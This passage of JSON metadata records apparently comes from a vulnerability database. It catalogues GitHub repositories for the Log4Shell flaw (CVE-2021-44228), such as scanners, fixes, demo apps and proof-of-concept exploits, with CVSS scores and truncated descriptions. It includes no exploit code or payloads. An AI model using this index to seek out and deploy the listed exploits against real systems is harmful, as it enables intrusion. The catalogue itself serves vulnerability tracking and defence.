"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T14:31:45", "id": "5C116D88-E2CC-5BC3-9A71-3174292E227D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:30:37", "description": "# log4shell4shell\nLog4j - Multitool. Find &amp; fix possible CVE...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-16T23:13:09", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-23T23:26:29", "id": "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:29:16", "description": "# log4j-pcap-activity\nA fun activity using a packet capture file...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-18T16:09:49", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-18T10:59:33", "id": "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:26:31", "description": "# XSYS-Log4J2Shell-Ex\n`CVE-2021-44228 (log4j2shell)` PoC as part...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-25T12:53:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T20:08:44", "id": "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:24:12", "description": "# Log4Shell\n\nCe projet est une d\u00e9monstration du fonctionnement d...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-01-12T23:44:20", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-12T23:59:13", "id": "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:29:16", "description": "# log4fix\nThis tool is to detect and fix the log4j log4shell vul...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-16T11:54:11", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-22T23:48:42", "id": "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:22", "description": "# Evaluate the Log4Shell: RCE 0-day Issue\n\nThis repo contains t...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-14T02:26:56", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T03:53:41", "id": "F32DF396-0485-5F43-8A52-31B8DD252790", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:10", "description": "# CVE-2021-44228 \n\n\n> \u3053\u3063\u3061\u306e\u304a\u8a71\u306e\u65b9\u304c\u3088\u308a\u5b9f\u7528\u6027\u304c\u3042\u308b\u3068\u601d\u3044\u307e\u3059(\u6ce3)[christophetd/lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T23:37:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T01:11:19", "id": "11719BED-E629-5C79-944E-7E40BBFC460C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:25:24", "description": "# Vulnerable application\n\nThis repository contains a Spring Boot...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-31T20:39:44", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-01T10:57:33", "id": "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-12T05:28:20", "description": "# Log4Shell\n\nThis repository is for Log4j 2021 (CVE-2021-44228) ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-12T03:02:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-12T03:02:24", "id": "E4491698-477C-599A-A65D-EBA7441764E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:28:58", "description": "# Get-log4j-Windows-local.ps1\n \n Identify all log4j components ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-19T07:35:01", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-28T18:51:03", "id": "7865A97A-CD10-5E45-9429-CF5F72A6952B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T01:33:11", "description": "# Log4NoShell\nA Java Agent that disables Apache Log4J's JNDI Loo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:33:57", "id": "1097EF60-FC77-5135-B92B-4A84B46FABAF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:35:57", "description": "# Log4NoShell\nA Java Agent that disables Apache Log4J's JNDI Loo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:33:57", "id": "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:28:33", "description": "# cve-2021-44228-log4j-test\n\n\ud14c\uc2a4\ud2b8\n \n## **1. LDAP \uc11c\ubc84\uc640 \ud574\ud0b9 \ud30c\uc77c \ub2e4\uc6b4\ub85c\ub4dc ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-20T11:07:21", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T04:27:08", "id": "8021D807-3EDC-55A7-A9ED-A364159FADEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-29T07:58:53", "description": "# CVE-2021-44228 (Apache Log4j Remote Code Execution\uff09\n\n> [all lo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-16T08:46:55", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-29T06:51:14", "id": "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:49", "description": "# evil-rmi-server\nAn evil RMI server that can launch an arbitrar...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T16:49:45", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:02", "id": "22AAF71B-053F-5E71-9F26-039C48FCCD62", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:27:16", "description": "# CVE-2021-44228-log4jVulnScanner-metasploit\nopen detection and ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-23T01:59:03", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:22", "id": "BA8F1657-CF64-574C-81BA-6432D5A351D4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:30", "description": "# log4j-nullroute\nQuick script to ingest IP feed from greynoise....", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T03:15:42", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:03", "id": "BE66A9B6-104B-5F49-918A-8B913CE46473", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:22", "description": "# Python Log4RCE\n\nAn all-in-one pure Python3 PoC for [CVE-2021-4...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T02:57:49", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-24T20:20:53", "id": "B22E3A22-BF14-5660-977A-2D28D2AA2500", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:09", "description": "# `log4j-remediation-tools`\n\n> Tools for finding and reproducing...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-14T21:47:04", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-08-09T21:35:25", "id": "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:26:41", "description": "# Log4j Simple Exploit\r\nA Proof-Of-Concept Exploit for ***CVE-20...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-24T09:26:38", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 